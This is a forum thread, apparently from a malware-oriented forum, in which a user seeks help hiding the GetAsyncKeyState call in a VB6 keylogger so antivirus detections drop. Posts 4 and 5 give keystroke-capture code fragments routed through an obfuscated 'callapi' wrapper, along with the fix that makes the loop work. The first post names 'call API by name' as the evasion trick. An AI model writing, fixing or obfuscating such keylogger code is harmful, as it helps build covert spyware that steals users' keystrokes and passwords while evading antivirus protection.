+ Reply to Thread
Results 1 to 7 of 7
  1. #1
    Junior Member ivnoidea's Avatar
    Join Date
    Oct 2009
    Location
    tampa, fl
    Posts
    23

    Plz Help me encrypt api call in vb6

    my last step is to encrypt my getkey api for my logger and im down to 2/24 i think NOD is picking up the api call as ive crypted EVERYTHING else. for some reason i just dont understand it, reading the cryter.vbp from slayer616.:'(


    edit* USE SEARCH CALL API BY NAME...MOD YOU CAN delete this thread

  2. #2
    Unregistered
    Guest
    mods never delete

    people will know you are a noob forever AHAHHAHAHAHAHA

  3. #3
    Junior Member ivnoidea's Avatar
    Join Date
    Oct 2009
    Location
    tampa, fl
    Posts
    23
    not forever? really? no i still dont get why the apicallbyname needs an integer and the declarations i can use

    for i blah blah blah getkeyasync(i)

  4. #4
    Junior Member ivnoidea's Avatar
    Join Date
    Oct 2009
    Location
    tampa, fl
    Posts
    23
    so why does this work

    Code:
        KeyResult = callapi(110)
        If KeyResult = -32767 Then
            If GetShift = False Then AddKey = "." Else AddKey = ">"
            GoTo KeyFound
        End If
    and this wont

    Code:
    For n = 65 To 128
        KeyResult = callapi(n)
        If KeyResult = -32767 Then
            If GetShift = False Then
                If GetCapslock = True Then AddKey = UCase(Chr(n)) Else AddKey = LCase(Chr(n))
            Else
                If GetCapslock = False Then AddKey = UCase(Chr(n)) Else AddKey = LCase(Chr(n))
            End If
            GoTo KeyFound
        End If
    Next n
    i get an error on the variable "n"

  5. #5
    Junior Member ivnoidea's Avatar
    Join Date
    Oct 2009
    Location
    tampa, fl
    Posts
    23
    for those who have the similar problem....(int(n)) works for this situation...

    sorry this is not a bump i can't edit after 24hr i guess.


    no one likes me here or helps, is there anyway to gain friends?:'(

  6. #6
    Senior Member
    Join Date
    Jun 2008
    Location
    0x40000
    Posts
    1,523
    Quote Originally Posted by ivnoidea View Post
    for those who have the similar problem....(int(n)) works for this situation...

    sorry this is not a bump i can't edit after 24hr i guess.


    no one likes me here or helps, is there anyway to gain friends?:'(
    Not everyone is 24/7 at his computer to insta-help you.

  7. #7
    Junior Member ivnoidea's Avatar
    Join Date
    Oct 2009
    Location
    tampa, fl
    Posts
    23
    yeah..., i get that. squeezer i think your one of the most helpful.

    that remark was more aimed toward the chatbox. everytime i chime to help the who chat crashes. just wondering the best way to gain rep. i might need to release something cool....<---me.

    its just a girl thing. im trying to join a forum and i hate facebook and myspace that my husband on

Thread Information

Users Browsing this Thread

There are currently 1 users browsing this thread. (0 members and 1 guests)

Similar Threads

  1. API Undetector v1 - Encrypt your apis
    By LeadMX in forum Malware Samples and Information
    Replies: 15
    Last Post: 21-12-2009, 22:57
  2. What happens if i muti-encrypt?
    By KoH in forum Malware Discussion and General Help
    Replies: 3
    Last Post: 06-09-2009, 23:39
  3. How to encrypt function help
    By unreachableboy in forum Delphi Help
    Replies: 6
    Last Post: 09-09-2008, 16:29
  4. encrypt a file that is already running
    By Darkness in forum Delphi Help
    Replies: 3
    Last Post: 03-09-2008, 11:25
  5. PE-Encrypt 1.1. D.D.W.
    By SunRise in forum Snippets
    Replies: 0
    Last Post: 08-10-2007, 22:36

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts

Search Engine Friendly URLs by vBSEO 3.6.0 ©2011, Crawlability, Inc.